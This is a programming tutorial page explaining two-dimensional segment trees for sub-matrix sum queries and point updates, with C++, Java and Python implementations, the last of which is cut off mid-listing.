CasesAsymptotic NotationsLittle o and little omega notationsLower and Upper Bound TheoryAnalysis of LoopsSolving RecurrencesAmortized AnalysisWhat does 'Space Complexity' mean ?Pseudo-polynomial AlgorithmsPolynomial Time Approximation SchemeA Time Complexity Question Asymptotic Analysis Worst, Average and Best Cases Asymptotic Notations Little o and little omega notations Lower and Upper Bound Theory Analysis of Loops Solving Recurrences Amortized Analysis What does 'Space Complexity' mean ? Pseudo-polynomial Algorithms Polynomial Time Approximation Scheme A Time Complexity Question Searching Algorithms Sorting Algorithms Graph Algorithms Pattern Searching Geometric Algorithms Mathematical Bitwise Algorithms Randomized Algorithms Greedy Algorithms Dynamic Programming Divide and Conquer Backtracking Branch and Bound All Algorithms Data StructuresArraysLinked ListStackQueueBinary TreeBinary Search TreeHeapHashingGraphAdvanced Data StructureMatrixStringsAll Data Structures Arrays Linked List Stack Queue Binary Tree Binary Search Tree Heap Hashing Graph Advanced Data Structure Matrix Strings All Data Structures Interview CornerCompany PreparationTop TopicsPractice Company QuestionsInterview ExperiencesExperienced InterviewsInternship InterviewsCompetititve ProgrammingDesign PatternsSystem Design TutorialMultiple Choice Quizzes Company Preparation Top Topics Practice Company Questions Interview Experiences Experienced Interviews Internship Interviews Competititve Programming Design Patterns System Design Tutorial Multiple Choice Quizzes LanguagesCC++JavaPythonC#JavaScriptjQuerySQLPHPScalaPerlGo LanguageHTMLCSSKotlin C C++ Java Python C# JavaScript jQuery SQL PHP Scala Perl Go Language HTML CSS Kotlin ML & Data ScienceMachine LearningData Science Machine Learning Data Science CS SubjectsMathematicsOperating SystemDBMSComputer NetworksComputer Organization and ArchitectureTheory of ComputationCompiler DesignDigital LogicSoftware Engineering Mathematics Operating System DBMS Computer Networks Computer Organization and Architecture Theory of Computation Compiler Design Digital Logic Software Engineering GATEGATE Computer Science NotesLast Minute NotesGATE CS Solved PapersGATE CS Original Papers and Official KeysGATE 2021 DatesGATE CS 2021 SyllabusImportant Topics for GATE CS GATE Computer Science Notes Last Minute Notes GATE CS Solved Papers GATE CS Original Papers and Official Keys GATE 2021 Dates GATE CS 2021 Syllabus Important Topics for GATE CS Web TechnologiesHTMLCSSJavaScriptAngularJSReactJSNodeJSBootstrapjQueryPHP HTML CSS JavaScript AngularJS ReactJS NodeJS Bootstrap jQuery PHP Software DesignsSoftware Design PatternsSystem Design Tutorial Software Design Patterns System Design Tutorial School LearningSchool ProgrammingMathematicsNumber SystemAlgebraTrigonometryStatisticsProbabilityGeometryMensurationCalculusMaths Notes (Class 8-12)Class 8 NotesClass 9 NotesClass 10 NotesClass 11 NotesClass 12 NotesNCERT SolutionsClass 8 Maths SolutionClass 9 Maths SolutionClass 10 Maths SolutionClass 11 Maths SolutionClass 12 Maths SolutionRD Sharma SolutionsClass 8 Maths SolutionClass 9 Maths SolutionClass 10 Maths SolutionClass 11 Maths SolutionClass 12 Maths SolutionPhysics Notes (Class 8-11)Class 8 NotesClass 9 NotesClass 10 NotesClass 11 Notes School Programming MathematicsNumber SystemAlgebraTrigonometryStatisticsProbabilityGeometryMensurationCalculus Number System Algebra Trigonometry Statistics Probability Geometry Mensuration Calculus Maths Notes (Class 8-12)Class 8 NotesClass 9 NotesClass 10 NotesClass 11 NotesClass 12 Notes Class 8 Notes Class 9 Notes Class 10 Notes Class 11 Notes Class 12 Notes NCERT SolutionsClass 8 Maths SolutionClass 9 Maths SolutionClass 10 Maths SolutionClass 11 Maths SolutionClass 12 Maths Solution Class 8 Maths Solution Class 9 Maths Solution Class 10 Maths Solution Class 11 Maths Solution Class 12 Maths Solution RD Sharma SolutionsClass 8 Maths SolutionClass 9 Maths SolutionClass 10 Maths SolutionClass 11 Maths SolutionClass 12 Maths Solution Class 8 Maths Solution Class 9 Maths Solution Class 10 Maths Solution Class 11 Maths Solution Class 12 Maths Solution Physics Notes (Class 8-11)Class 8 NotesClass 9 NotesClass 10 NotesClass 11 Notes Class 8 Notes Class 9 Notes Class 10 Notes Class 11 Notes CS Exams/PSUsISROISRO CS Original Papers and Official KeysISRO CS Solved PapersISRO CS Syllabus for Scientist/Engineer ExamUGC NETUGC NET CS Notes Paper IIUGC NET CS Notes Paper IIIUGC NET CS Solved Papers ISROISRO CS Original Papers and Official KeysISRO CS Solved PapersISRO CS Syllabus for Scientist/Engineer Exam ISRO CS Original Papers and Official Keys ISRO CS Solved Papers ISRO CS Syllabus for Scientist/Engineer Exam UGC NETUGC NET CS Notes Paper IIUGC NET CS Notes Paper IIIUGC NET CS Solved Papers UGC NET CS Notes Paper II UGC NET CS Notes Paper III UGC NET CS Solved Papers StudentCampus Ambassador ProgramSchool Ambassador ProgramProjectGeek of the MonthCampus Geek of the MonthPlacement CourseCompetititve ProgrammingTestimonialsStudent ChapterGeek on the TopInternshipCareers Campus Ambassador Program School Ambassador Program Project Geek of the Month Campus Geek of the Month Placement Course Competititve Programming Testimonials Student Chapter Geek on the Top Internship Careers JobsApply for JobsPost a JobJOB-A-THON Apply for Jobs Post a Job JOB-A-THON PracticeAll DSA ProblemsProblem of the DayInterview Series: Weekly ContestsBi-Wizard Coding: School ContestsContests and EventsPractice SDE SheetCurated DSA ListsLove Babbar SheetTop 50 Array ProblemsTop 50 String ProblemsTop 50 Tree ProblemsTop 50 Graph ProblemsTop 50 DP Problems All DSA Problems Problem of the Day Interview Series: Weekly Contests Bi-Wizard Coding: School Contests Contests and Events Practice SDE Sheet Curated DSA ListsLove Babbar SheetTop 50 Array ProblemsTop 50 String ProblemsTop 50 Tree ProblemsTop 50 Graph ProblemsTop 50 DP Problems Love Babbar Sheet Top 50 Array Problems Top 50 String Problems Top 50 Tree Problems Top 50 Graph Problems Top 50 DP Problems WriteCome write articles for us and get featuredPracticeLearn and code with the best industry expertsPremiumGet access to ad-free content, doubt assistance and more!JobsCome and find your dream job with usGeeks DigestQuizzesGeeks CampusGblog ArticlesIDECampus Mantri Geeks Digest Quizzes Geeks Campus Gblog Articles IDE Campus Mantri Sign In Sign In Home Saved Videos Courses For Working Professionals LIVE DSA Live Classes System Design Java Backend Development Full Stack LIVE Explore More Self-Paced DSA- Self Paced SDE Theory Must-Do Coding Questions Explore More For Students LIVE Competitive Programming Data Structures with C++ Data Science Explore More Self-Paced DSA- Self Paced CIP JAVA / Python / C++ Explore More School Courses School Guide Python Programming Learn To Make Apps Explore more Algorithms Searching Algorithms Sorting Algorithms Graph Algorithms Pattern Searching Geometric Algorithms Mathematical Bitwise Algorithms Randomized Algorithms Greedy Algorithms Dynamic Programming Divide and Conquer Backtracking Branch and Bound All Algorithms Analysis of Algorithms Asymptotic Analysis Worst, Average and Best Cases Asymptotic Notations Little o and little omega notations Lower and Upper Bound Theory Analysis of Loops Solving Recurrences Amortized Analysis What does 'Space Complexity' mean ? Pseudo-polynomial Algorithms Polynomial Time Approximation Scheme A Time Complexity Question Data Structures Arrays Linked List Stack Queue Binary Tree Binary Search Tree Heap Hashing Graph Advanced Data Structure Matrix Strings All Data Structures Interview Corner Company Preparation Top Topics Practice Company Questions Interview Experiences Experienced Interviews Internship Interviews Competititve Programming Design Patterns System Design Tutorial Multiple Choice Quizzes Languages C C++ Java Python C# JavaScript jQuery SQL PHP Scala Perl Go Language HTML CSS Kotlin ML & Data Science Machine Learning Data Science CS Subjects Mathematics Operating System DBMS Computer Networks Computer Organization and Architecture Theory of Computation Compiler Design Digital Logic Software Engineering GATE GATE Computer Science Notes Last Minute Notes GATE CS Solved Papers GATE CS Original Papers and Official Keys GATE 2021 Dates GATE CS 2021 Syllabus Important Topics for GATE CS Web Technologies HTML CSS JavaScript AngularJS ReactJS NodeJS Bootstrap jQuery PHP Software Designs Software Design Patterns System Design Tutorial School Learning School Programming Mathematics Number System Algebra Trigonometry Statistics Probability Geometry Mensuration Calculus Maths Notes (Class 8-12) Class 8 Notes Class 9 Notes Class 10 Notes Class 11 Notes Class 12 Notes NCERT Solutions Class 8 Maths Solution Class 9 Maths Solution Class 10 Maths Solution Class 11 Maths Solution Class 12 Maths Solution RD Sharma Solutions Class 8 Maths Solution Class 9 Maths Solution Class 10 Maths Solution Class 11 Maths Solution Class 12 Maths Solution Physics Notes (Class 8-11) Class 8 Notes Class 9 Notes Class 10 Notes Class 11 Notes CS Exams/PSUs ISRO ISRO CS Original Papers and Official Keys ISRO CS Solved Papers ISRO CS Syllabus for Scientist/Engineer Exam UGC NET UGC NET CS Notes Paper II UGC NET CS Notes Paper III UGC NET CS Solved Papers Student Campus Ambassador Program School Ambassador Program Project Geek of the Month Campus Geek of the Month Placement Course Competititve Programming Testimonials Student Chapter Geek on the Top Internship Careers Curated DSA Lists Love Babbar Sheet Top 50 Array Problems Top 50 String Problems Top 50 Tree Problems Top 50 Graph Problems Top 50 DP Problems Tutorials Jobs Apply for Jobs Post a Job JOB-A-THON Practice All DSA Problems Problem of the Day Interview Series: Weekly Contests Bi-Wizard Coding: School Contests Contests and Events Practice SDE Sheet For Working Professionals LIVE DSA Live Classes System Design Java Backend Development Full Stack LIVE Explore More DSA Live Classes System Design Java Backend Development Full Stack LIVE Explore More Self-Paced DSA- Self Paced SDE Theory Must-Do Coding Questions Explore More DSA- Self Paced SDE Theory Must-Do Coding Questions Explore More For Students LIVE Competitive Programming Data Structures with C++ Data Science Explore More Competitive Programming Data Structures with C++ Data Science Explore More Self-Paced DSA- Self Paced CIP JAVA / Python / C++ Explore More DSA- Self Paced CIP JAVA / Python / C++ Explore More School Courses School Guide Python Programming Learn To Make Apps Explore more School Guide Python Programming Learn To Make Apps Explore more Algorithms Searching Algorithms Sorting Algorithms Graph Algorithms Pattern Searching Geometric Algorithms Mathematical Bitwise Algorithms Randomized Algorithms Greedy Algorithms Dynamic Programming Divide and Conquer Backtracking Branch and Bound All Algorithms Searching Algorithms Sorting Algorithms Graph Algorithms Pattern Searching Geometric Algorithms Mathematical Bitwise Algorithms Randomized Algorithms Greedy Algorithms Dynamic Programming Divide and Conquer Backtracking Branch and Bound All Algorithms Analysis of Algorithms Asymptotic Analysis Worst, Average and Best Cases Asymptotic Notations Little o and little omega notations Lower and Upper Bound Theory Analysis of Loops Solving Recurrences Amortized Analysis What does 'Space Complexity' mean ? Pseudo-polynomial Algorithms Polynomial Time Approximation Scheme A Time Complexity Question Asymptotic Analysis Worst, Average and Best Cases Asymptotic Notations Little o and little omega notations Lower and Upper Bound Theory Analysis of Loops Solving Recurrences Amortized Analysis What does 'Space Complexity' mean ? Pseudo-polynomial Algorithms Polynomial Time Approximation Scheme A Time Complexity Question Data Structures Arrays Linked List Stack Queue Binary Tree Binary Search Tree Heap Hashing Graph Advanced Data Structure Matrix Strings All Data Structures Arrays Linked List Stack Queue Binary Tree Binary Search Tree Heap Hashing Graph Advanced Data Structure Matrix Strings All Data Structures Interview Corner Company Preparation Top Topics Practice Company Questions Interview Experiences Experienced Interviews Internship Interviews Competititve Programming Design Patterns System Design Tutorial Multiple Choice Quizzes Company Preparation Top Topics Practice Company Questions Interview Experiences Experienced Interviews Internship Interviews Competititve Programming Design Patterns System Design Tutorial Multiple Choice Quizzes Languages C C++ Java Python C# JavaScript jQuery SQL PHP Scala Perl Go Language HTML CSS Kotlin C C++ Java Python C# JavaScript jQuery SQL PHP Scala Perl Go Language HTML CSS Kotlin ML & Data Science Machine Learning Data Science Machine Learning Data Science CS Subjects Mathematics Operating System DBMS Computer Networks Computer Organization and Architecture Theory of Computation Compiler Design Digital Logic Software Engineering Mathematics Operating System DBMS Computer Networks Computer Organization and Architecture Theory of Computation Compiler Design Digital Logic Software Engineering GATE GATE Computer Science Notes Last Minute Notes GATE CS Solved Papers GATE CS Original Papers and Official Keys GATE 2021 Dates GATE CS 2021 Syllabus Important Topics for GATE CS GATE Computer Science Notes Last Minute Notes GATE CS Solved Papers GATE CS Original Papers and Official Keys GATE 2021 Dates GATE CS 2021 Syllabus Important Topics for GATE CS Web Technologies HTML CSS JavaScript AngularJS ReactJS NodeJS Bootstrap jQuery PHP HTML CSS JavaScript AngularJS ReactJS NodeJS Bootstrap jQuery PHP Software Designs Software Design Patterns System Design Tutorial Software Design Patterns System Design Tutorial School Learning School Programming School Programming Mathematics Number System Algebra Trigonometry Statistics Probability Geometry Mensuration Calculus Number System Algebra Trigonometry Statistics Probability Geometry Mensuration Calculus Maths Notes (Class 8-12) Class 8 Notes Class 9 Notes Class 10 Notes Class 11 Notes Class 12 Notes Class 8 Notes Class 9 Notes Class 10 Notes Class 11 Notes Class 12 Notes NCERT Solutions Class 8 Maths Solution Class 9 Maths Solution Class 10 Maths Solution Class 11 Maths Solution Class 12 Maths Solution Class 8 Maths Solution Class 9 Maths Solution Class 10 Maths Solution Class 11 Maths Solution Class 12 Maths Solution RD Sharma Solutions Class 8 Maths Solution Class 9 Maths Solution Class 10 Maths Solution Class 11 Maths Solution Class 12 Maths Solution Class 8 Maths Solution Class 9 Maths Solution Class 10 Maths Solution Class 11 Maths Solution Class 12 Maths Solution Physics Notes (Class 8-11) Class 8 Notes Class 9 Notes Class 10 Notes Class 11 Notes Class 8 Notes Class 9 Notes Class 10 Notes Class 11 Notes CS Exams/PSUs ISRO ISRO CS Original Papers and Official Keys ISRO CS Solved Papers ISRO CS Syllabus for Scientist/Engineer Exam ISRO CS Original Papers and Official Keys ISRO CS Solved Papers ISRO CS Syllabus for Scientist/Engineer Exam UGC NET UGC NET CS Notes Paper II UGC NET CS Notes Paper III UGC NET CS Solved Papers UGC NET CS Notes Paper II UGC NET CS Notes Paper III UGC NET CS Solved Papers Student Campus Ambassador Program School Ambassador Program Project Geek of the Month Campus Geek of the Month Placement Course Competititve Programming Testimonials Student Chapter Geek on the Top Internship Careers Campus Ambassador Program School Ambassador Program Project Geek of the Month Campus Geek of the Month Placement Course Competititve Programming Testimonials Student Chapter Geek on the Top Internship Careers Curated DSA Lists Love Babbar Sheet Top 50 Array Problems Top 50 String Problems Top 50 Tree Problems Top 50 Graph Problems Top 50 DP Problems Love Babbar Sheet Top 50 Array Problems Top 50 String Problems Top 50 Tree Problems Top 50 Graph Problems Top 50 DP Problems Tutorials Jobs Apply for Jobs Post a Job JOB-A-THON Apply for Jobs Post a Job JOB-A-THON Practice All DSA Problems Problem of the Day Interview Series: Weekly Contests Bi-Wizard Coding: School Contests Contests and Events Practice SDE Sheet All DSA Problems Problem of the Day Interview Series: Weekly Contests Bi-Wizard Coding: School Contests Contests and Events Practice SDE Sheet GBlog Puzzles What's New ? Array Matrix Strings Hashing Linked List Stack Queue Binary Tree Binary Search Tree Heap Graph Searching Sorting Divide & Conquer Mathematical Geometric Bitwise Greedy Backtracking Branch and Bound Dynamic Programming Pattern Searching Randomized AVL Tree | Set 1 (Insertion) Trie | (Insert and Search) LRU Cache Implementation Red-Black Tree | Set 1 (Introduction) Introduction of B-Tree Segment Tree | Set 1 (Sum of given range) Agents in Artificial Intelligence AVL Tree | Set 2 (Deletion) Decision Tree Introduction with example Red-Black Tree | Set 2 (Insert) Binary Indexed Tree or Fenwick Tree Disjoint Set Data Structures Insert Operation in B-Tree Design a Chess Game Binomial Heap Design a data structure that supports insert, delete, search and getRandom in constant time XOR Linked List - A Memory Efficient Doubly Linked List | Set 1 How to design a tiny URL or URL shortener? Generic Linked List in C Difference between B tree and B+ tree Red-Black Tree | Set 3 (Delete) Skip List | Set 1 (Introduction) Largest Rectangular Area in a Histogram | Set 1 Splay Tree | Set 1 (Search) Fibonacci Heap | Set 1 (Introduction) Pattern Searching using Suffix Tree Delete Operation in B-Tree K Dimensional Tree | Set 1 (Search and Insert) Auto-complete feature using Trie Some Basic Theorems on Trees AVL Tree | Set 1 (Insertion) Trie | (Insert and Search) LRU Cache Implementation Red-Black Tree | Set 1 (Introduction) Introduction of B-Tree Segment Tree | Set 1 (Sum of given range) Agents in Artificial Intelligence AVL Tree | Set 2 (Deletion) Decision Tree Introduction with example Red-Black Tree | Set 2 (Insert) Binary Indexed Tree or Fenwick Tree Disjoint Set Data Structures Insert Operation in B-Tree Design a Chess Game Binomial Heap Design a data structure that supports insert, delete, search and getRandom in constant time XOR Linked List - A Memory Efficient Doubly Linked List | Set 1 How to design a tiny URL or URL shortener? Generic Linked List in C Difference between B tree and B+ tree Red-Black Tree | Set 3 (Delete) Skip List | Set 1 (Introduction) Largest Rectangular Area in a Histogram | Set 1 Splay Tree | Set 1 (Search) Fibonacci Heap | Set 1 (Introduction) Pattern Searching using Suffix Tree Delete Operation in B-Tree K Dimensional Tree | Set 1 (Search and Insert) Auto-complete feature using Trie Some Basic Theorems on Trees Difficulty Level : Hard Given a rectangular matrix M[0...n-1][0...m-1], and queries are asked to find the sum / minimum / maximum on some sub-rectangles M[a...b][e...f], as well as queries for modification of individual matrix elements (i.e M[x] [y] = p ). We can also answer sub-matrix queries using Two Dimensional Binary Indexed Tree.In this article, We will focus on solving sub-matrix queries using two dimensional segment tree.Two dimensional segment tree is nothing but segment tree of segment trees. Prerequisite : Segment Tree – Sum of given range Algorithm : We will build a two-dimensional tree of segments by the following principle: 1 . In First step, We will construct an ordinary one-dimensional segment tree, working only with the first coordinate say ‘x’ and ‘y’ as constant. Here, we will not write number in inside the node as in the one-dimensional segment tree, but an entire tree of segments. 2. The second step is to combine the values of segmented trees. Assume that in second step instead of combining the elements we are combining the segment trees obtained from the step first. Consider the below example. Suppose we have to find the sum of all numbers inside the highlighted red area Step 1 : We will first create the segment tree of each strip of y- axis.We represent the segment tree here as an array where child node is 2n and 2n+1 where n > 0.Segment Tree for strip y=1 Segment Tree for Strip y = 2 Segment Tree for Strip y = 3 Segment Tree for Strip y = 4 Step 2: In this step, we create the segment tree for the rectangular matrix where the base node are the strips of y-axis given above.The task is to merge above segment trees. Sum Query : Thanks to Sahil Bansal for contributing this image. Processing Query : We will respond to the two-dimensional query by the following principle: first to break the query on the first coordinate, and then, when we reached some vertex of the tree of segments with the first coordinate and then we call the corresponding tree of segments on the second coordinate.This function works in time O(logn*log m), because it first descends the tree in the first coordinate, and for each traversed vertex of that tree, it makes a query from the usual tree of segments along the second coordinate. Modification Query :We want to learn how to modify the tree of segments in accordance with the change in the value of an element M[x] [y] = p .It is clear that the changes will occur only in those vertices of the first tree of segments that cover the coordinate x, and for the trees of the segments corresponding to them, the changes will only occur in those vertices that cover the coordinate y. Therefore, the implementation of the modification request will not be very different from the one-dimensional case, only now we first descend the first coordinate, and then the second. Output for the highlighted area will be 25. Below is the implementation of above approach : C++ Java Python3 C# Javascript // C++ program for implementation// of 2D segment tree.#include <bits/stdc++.h>using namespace std; // Base node of segment tree.int ini_seg[1000][1000] = { 0 }; // final 2d-segment tree.int fin_seg[1000][1000] = { 0 }; // Rectangular matrix.int rect[4][4] = { { 1, 2, 3, 4 }, { 5, 6, 7, 8 }, { 1, 7, 5, 9 }, { 3, 0, 6, 2 },}; // size of x coordinate.int size = 4; /* * A recursive function that constructs * Initial Segment Tree for array rect[][] = { }. * 'pos' is index of current node in segment * tree seg[]. 'strip' is the enumeration * for the y-axis.*/ int segment(int low, int high, int pos, int strip){ if (high == low) { ini_seg[strip][pos] = rect[strip][low]; } else { int mid = (low + high) / 2; segment(low, mid, 2 * pos, strip); segment(mid + 1, high, 2 * pos + 1, strip); ini_seg[strip][pos] = ini_seg[strip][2 * pos] + ini_seg[strip][2 * pos + 1]; }} /* * A recursive function that constructs * Final Segment Tree for array ini_seg[][] = { }.*/int finalSegment(int low, int high, int pos){ if (high == low) { for (int i = 1; i < 2 * size; i++) fin_seg[pos][i] = ini_seg[low][i]; } else { int mid = (low + high) / 2; finalSegment(low, mid, 2 * pos); finalSegment(mid + 1, high, 2 * pos + 1); for (int i = 1; i < 2 * size; i++) fin_seg[pos][i] = fin_seg[2 * pos][i] + fin_seg[2 * pos + 1][i]; }} /** Return sum of elements in range from index* x1 to x2 . It uses the final_seg[][] array* created using finalsegment() function.* 'pos' is index of current node in* segment tree fin_seg[][].*/int finalQuery(int pos, int start, int end, int x1, int x2, int node){ if (x2 < start || end < x1) { return 0; } if (x1 <= start && end <= x2) { return fin_seg[node][pos]; } int mid = (start + end) / 2; int p1 = finalQuery(2 * pos, start, mid, x1, x2, node); int p2 = finalQuery(2 * pos + 1, mid + 1, end, x1, x2, node); return (p1 + p2);} /** This function calls the finalQuery function* for elements in range from index x1 to x2 .* This function queries the yth coordinate.*/int query(int pos, int start, int end, int y1, int y2, int x1, int x2){ if (y2 < start || end < y1) { return 0; } if (y1 <= start && end <= y2) { return (finalQuery(1, 1, 4, x1, x2, pos)); } int mid = (start + end) / 2; int p1 = query(2 * pos, start, mid, y1, y2, x1, x2); int p2 = query(2 * pos + 1, mid + 1, end, y1, y2, x1, x2); return (p1 + p2);} /* A recursive function to update the nodes which for the given index. The following are parameters : pos --> index of current node in segment tree fin_seg[][]. x -> index of the element to be updated. val --> Value to be change at node idx*/int finalUpdate(int pos, int low, int high, int x, int val, int node){ if (low == high) { fin_seg[node][pos] = val; } else { int mid = (low + high) / 2; if (low <= x && x <= mid) { finalUpdate(2 * pos, low, mid, x, val, node); } else { finalUpdate(2 * pos + 1, mid + 1, high, x, val, node); } fin_seg[node][pos] = fin_seg[node][2 * pos] + fin_seg[node][2 * pos + 1]; }} /* This function call the final update function after visiting the yth coordinate in the segment tree fin_seg[][].*/int update(int pos, int low, int high, int x, int y, int val){ if (low == high) { finalUpdate(1, 1, 4, x, val, pos); } else { int mid = (low + high) / 2; if (low <= y && y <= mid) { update(2 * pos, low, mid, x, y, val); } else { update(2 * pos + 1, mid + 1, high, x, y, val); } for (int i = 1; i < size; i++) fin_seg[pos][i] = fin_seg[2 * pos][i] + fin_seg[2 * pos + 1][i]; }} // Driver program to test above functionsint main(){ int pos = 1; int low = 0; int high = 3; // Call the ini_segment() to create the // initial segment tree on x- coordinate for (int strip = 0; strip < 4; strip++) segment(low, high, 1, strip); // Call the final function to built the 2d segment tree. finalSegment(low, high, 1); /* Query: * To request the query for sub-rectangle y1, y2=(2, 3) x1, x2=(2, 3) * update the value of index (3, 3)=100; * To request the query for sub-rectangle y1, y2=(2, 3) x1, x2=(2, 3)*/ cout << "The sum of the submatrix (y1, y2)->(2, 3), " << " (x1, x2)->(2, 3) is " << query(1, 1, 4, 2, 3, 2, 3) << endl; // Function to update the value update(1, 1, 4, 2, 3, 100); cout << "The sum of the submatrix (y1, y2)->(2, 3), " << "(x1, x2)->(2, 3) is " << query(1, 1, 4, 2, 3, 2, 3) << endl; return 0;} // Java program for implementation// of 2D segment tree.import java.util.*; class GfG{ // Base node of segment tree.static int ini_seg[][] = new int[1000][1000]; // final 2d-segment tree.static int fin_seg[][] = new int[1000][1000]; // Rectangular matrix.static int rect[][] = {{ 1, 2, 3, 4 }, { 5, 6, 7, 8 }, { 1, 7, 5, 9 }, { 3, 0, 6, 2 }, }; // size of x coordinate.static int size = 4; /** A recursive function that constructs* Initial Segment Tree for array rect[][] = { }.* 'pos' is index of current node in segment* tree seg[]. 'strip' is the enumeration* for the y-axis.*/ static void segment(int low, int high, int pos, int strip){ if (high == low) { ini_seg[strip][pos] = rect[strip][low]; } else { int mid = (low + high) / 2; segment(low, mid, 2 * pos, strip); segment(mid + 1, high, 2 * pos + 1, strip); ini_seg[strip][pos] = ini_seg[strip][2 * pos] + ini_seg[strip][2 * pos + 1]; }} /** A recursive function that constructs* Final Segment Tree for array ini_seg[][] = { }.*/static void finalSegment(int low, int high, int pos){ if (high == low) { for (int i = 1; i < 2 * size; i++) fin_seg[pos][i] = ini_seg[low][i]; } else { int mid = (low + high) / 2; finalSegment(low, mid, 2 * pos); finalSegment(mid + 1, high, 2 * pos + 1); for (int i = 1; i < 2 * size; i++) fin_seg[pos][i] = fin_seg[2 * pos][i] + fin_seg[2 * pos + 1][i]; }} /** Return sum of elements in range from index* x1 to x2 . It uses the final_seg[][] array* created using finalsegment() function.* 'pos' is index of current node in* segment tree fin_seg[][].*/static int finalQuery(int pos, int start, int end, int x1, int x2, int node){ if (x2 < start || end < x1) { return 0; } if (x1 <= start && end <= x2) { return fin_seg[node][pos]; } int mid = (start + end) / 2; int p1 = finalQuery(2 * pos, start, mid, x1, x2, node); int p2 = finalQuery(2 * pos + 1, mid + 1, end, x1, x2, node); return (p1 + p2);} /** This function calls the finalQuery function* for elements in range from index x1 to x2 .* This function queries the yth coordinate.*/static int query(int pos, int start, int end, int y1, int y2, int x1, int x2){ if (y2 < start || end < y1) { return 0; } if (y1 <= start && end <= y2) { return (finalQuery(1, 1, 4, x1, x2, pos)); } int mid = (start + end) / 2; int p1 = query(2 * pos, start, mid, y1, y2, x1, x2); int p2 = query(2 * pos + 1, mid + 1, end, y1, y2, x1, x2); return (p1 + p2);} /* A recursive function to update the nodeswhich for the given index. The followingare parameters : pos --> index of currentnode in segment tree fin_seg[][]. x ->index of the element to be updated. val -->Value to be change at node idx*/static void finalUpdate(int pos, int low, int high, int x, int val, int node){ if (low == high) { fin_seg[node][pos] = val; } else { int mid = (low + high) / 2; if (low <= x && x <= mid) { finalUpdate(2 * pos, low, mid, x, val, node); } else { finalUpdate(2 * pos + 1, mid + 1, high, x, val, node); } fin_seg[node][pos] = fin_seg[node][2 * pos] + fin_seg[node][2 * pos + 1]; }} /*This function call the finalupdate function after visitingthe yth coordinate in the segmenttree fin_seg[][].*/static void update(int pos, int low, int high, int x, int y, int val){ if (low == high) { finalUpdate(1, 1, 4, x, val, pos); } else { int mid = (low + high) / 2; if (low <= y && y <= mid) { update(2 * pos, low, mid, x, y, val); } else { update(2 * pos + 1, mid + 1, high, x, y, val); } for (int i = 1; i < size; i++) fin_seg[pos][i] = fin_seg[2 * pos][i] + fin_seg[2 * pos + 1][i]; }} // Driver codepublic static void main(String[] args){ int pos = 1; int low = 0; int high = 3; // Call the ini_segment() to create the // initial segment tree on x- coordinate for (int strip = 0; strip < 4; strip++) segment(low, high, 1, strip); // Call the final function to // built the 2d segment tree. finalSegment(low, high, 1); /*Query:* To request the query for sub-rectangley1, y2=(2, 3) x1, x2=(2, 3)* update the value of index (3, 3)=100;* To request the query for sub-rectangley1, y2=(2, 3) x1, x2=(2, 3)*/ System.out.println("The sum of the submatrix (y1, y2)->(2, 3), " + " (x1, x2)->(2, 3) is " + query(1, 1, 4, 2, 3, 2, 3)); // Function to update the value update(1, 1, 4, 2, 3, 100); System.out.println("The sum of the submatrix (y1, y2)->(2, 3), " + "(x1, x2)->(2, 3) is " + query(1, 1, 4, 2, 3, 2, 3)); }} // This code has been contributed by 29AjayKumar # Python 3 program for implementation# of 2D segment tree. # Base node of segment tree.ini_seg = [[ 0 for x in range(1000)] for y in range(1000)] # final 2d-segment tree.fin_seg = [[ 0 for x in range(1000)] for y in range(1000)] # Rectangular matrix.rect= [[ 1, 2, 3, 4 ], [ 5, 6, 7, 8 ], [ 1, 7, 5, 9 ], [ 3, 0, 6, 2 ]] # size of x coordinate.size = 4 '''* A recursive function that constructs* Initial Segment Tree for array rect[][] = { }.* 'pos' is index of current node in segment* tree seg[]. 'strip' is the enumeration* for the y-axis.''' def segment(low, high, pos, strip): if (high == low) : ini_seg[strip][pos] = rect[strip][low] else : mid = (low + high) // 2 segment(low, mid, 2 * pos, strip) segment(mid + 1, high, 2 * pos + 1, strip) ini_seg[strip][pos] = (ini_seg[strip][2 * pos] + ini_seg[strip][2 * pos + 1]) # A recursive function that constructs# Final Segment Tree for array ini_seg[][] = { }.def finalSegment(low, high, pos): if (high == low) : for i in range(1, 2 * size): fin_seg[pos][i] = ini_seg[low][i] else : mid = (low + high) // 2 finalSegment(low, mid, 2 * pos) finalSegment(mid + 1, high, 2 * pos + 1) for i in range( 1, 2 * size): fin_seg[pos][i] = (fin_seg[2 * pos][i] + fin_seg[2 * pos + 1][i]) '''* Return sum of elements in range* from index x1 to x2 . It uses the* final_seg[][] array created using* finalsegment() function. 'pos' is* index of current node in segment* tree fin_seg[][].'''def finalQuery(pos, start, end, x1, x2, node): if (x2 < start or end < x1) : return 0 if (x1 <= start and end <= x2) : return fin_seg[node][pos] mid = (start + end) // 2 p1 = finalQuery(2 * pos, start, mid, x1, x2, node) p2 = finalQuery(2 * pos + 1, mid + 1, end, x1, x2, node) return (p1 + p2) '''* This function calls the finalQuery function* for elements in range from index x1 to x2 .* This function queries the yth coordinate.'''def query(pos, start, end, y1, y2, x1, x2): if (y2 < start or end < y1) : return 0 if (y1 <= start and end <= y2) : return (finalQuery(1, 1, 4, x1, x2, pos)) mid = (start + end) // 2 p1 = query(2 * pos, start, mid, y1, y2, x1, x2) p2 = query(2 * pos + 1, mid + 1, end, y1, y2, x1, x2) return (p1 + p2) ''' A recursive function to update the nodeswhich for the given index. The followingare parameters : pos --> index of currentnode in segment tree fin_seg[][]. x ->index of the element to be updated. val -->Value to be change at node idx'''def finalUpdate(pos, low, high, x, val, node): if (low == high) : fin_seg[node][pos] = val else : mid = (low + high) // 2 if (low <= x and x <= mid) : finalUpdate(2 * pos, low, mid, x, val, node) else : finalUpdate(2 * pos + 1, mid + 1, high, x, val, node) fin_seg[node][pos] = (fin_seg[node][2 * pos] + fin_seg[node][2 * pos + 1]) # This function call the final# update function after visiting# the yth coordinate in the# segment tree fin_seg[][].def update(pos, low, high, x, y, val): if (low == high) : finalUpdate(1, 1, 4, x, val, pos) else : mid = (low + high) // 2 if (low <= y and y <= mid) : update(2 * pos, low, mid, x, y, val) else : update(2 * pos + 1, mid + 1, high, x, y, val) for i in range(1, size): fin_seg[pos][i] = (fin_seg[2 * pos][i] + fin_seg[2 * pos + 1][i]) # Driver Codeif __name__ == "__main__": pos = 1 low = 0 high = 3 # Call the ini_segment() to create the # initial segment tree on x- coordinate for strip in range(4): segment(low, high, 1, strip) # Call the final function to built # the 2d segment tree. finalSegment(low, high, 1)''' Query: * To request the query for sub-rectangle * y1, y2=(2, 3) x1, x2=(2, 3) * update the value of index (3, 3)=100; * To request the query for 